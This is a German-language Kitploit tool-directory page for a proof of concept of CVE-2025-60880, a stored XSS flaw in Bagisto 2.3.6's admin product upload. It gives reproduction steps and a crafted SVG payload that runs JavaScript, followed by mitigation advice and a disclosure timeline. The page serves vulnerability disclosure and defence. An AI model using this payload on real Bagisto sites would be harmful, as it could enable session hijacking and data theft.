Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-60880 — Proof-of-concept für eine gespeicherte XSS-Schwachstelle im Bagisto-Adminpanel, die den SVG-Upload mit schädlichem JavaScript demonstriert und Empfehlungen zur Abschwächung bereitstellt. | Kitploit
Tools/GitHubGitHub/shenal01/cve-2025-60880
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitLernen & Bildung
GitHubshenal01/cve-2025-60880

CVE-2025-60880

Proof-of-concept für eine gespeicherte XSS-Schwachstelle im Bagisto-Adminpanel, die den SVG-Upload mit schädlichem JavaScript demonstriert und Empfehlungen zur Abschwächung bereitstellt.

Repository anzeigen
1vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-60880: Stored Cross-Site Scripting (XSS) im Bagisto Admin-Panel

Eine authentifizierte Stored-XSS-Schwachstelle besteht im Produkterstellungspfad des Bagisto-2.3.6-Admin-Panels, die es einem Angreifer ermöglicht, eine manipulierte SVG-Datei mit bösartigem JavaScript-Code hochzuladen. Diese Schwachstelle kann von einem authentifizierten Admin-Benutzer ausgenutzt werden, um beliebiges JavaScript im Browser auszuführen, was möglicherweise zu Session-Hijacking, Datendiebstahl oder unbefugten Aktionen führen kann.


Schwachstellenübersicht

  • CVE-ID: CVE-2025-60880
  • Typ: Cross Site Scripting (XSS)
  • CVSS-Score: 6.9 (Mittel)
  • CVSS-Vektor: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N
  • Betroffener Hersteller: Bagisto
  • Betroffenes Produkt: Bagisto
  • Betroffene Version: v2.3.6
  • Betroffene Komponente: Bagisto Admin-Panel (Produkterstellungspfad)
  • Angriffsvektor: Remote
  • Authentifizierung: Admin-Rechte erforderlich
  • Auswirkung: Codeausführung, Session-Hijacking, Datendiebstahl

Proof of Concept (PoC)

Die Schwachstelle wird ausgenutzt, wenn ein authentifizierter Administrator eine manipulierte SVG-Datei mit bösartigem JavaScript hochlädt.

Schritte zur Reproduktion:

  • Melden Sie sich als authentifizierter Administrator im Bagisto Admin-Panel an.
  • Navigieren Sie zum Produkterstellungspfad.
  • Laden Sie eine manipulierte SVG-Datei mit einem JavaScript-Payload hoch.
  • Die Anfrage wird nach Änderung des Content-Type-Headers erneut abgespielt.
  • Die bösartige SVG-Datei wird auf dem Server gespeichert.
  • Wenn die URL der Datei aufgerufen wird, wird das JavaScript im Browser des Benutzers ausgeführt.
  • Beispiel für einen bösartigen SVG-Payload:

    root@kitploit:~
    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    
    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
       <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
       <script type="text/javascript">
          alert(document.domain);
       </script>
    </svg>
    

    Empfehlungen

    • Zur Behebung dieser Schwachstelle werden die folgenden Maßnahmen empfohlen:
    • Implementieren Sie Eingabevalidierung, Content-Type-Erzwingung und eine ordnungsgemäße Dateiverwaltung.
    • Beschränken Sie Datei-Uploads auf vertrauenswürdige Formate und bereinigen Sie SVG-Dateien, um potenziell schädliche Inhalte zu entfernen.

    Offenlegungszeitplan

    DatumAktion
    2025 AUGSchwachstelle entdeckt
    2025 AUGVerantwortungsvolle Offenlegung
    2025 AUGCVE-ID bei MITRE beantragt
    2025 OCTCVE zugewiesen, öffentliche Offenlegung

    Haftungsausschluss

    Die in diesem Repository bereitgestellten Informationen und Proof-of-Concept- (PoC-) Codes dienen ausschließlich Bildungs- und ethischen Forschungszwecken. Der Autor ist nicht verantwortlich für jeglichen Missbrauch oder Schaden, der durch die hierin bereitgestellten Informationen oder Codes verursacht wird. Der Benutzer übernimmt die volle Verantwortung für seine Handlungen. Es liegt in der Verantwortung des Benutzers, sicherzustellen, dass er alle geltenden lokalen, staatlichen und bundesstaatlichen Gesetze einhält.

    Tool herunterladen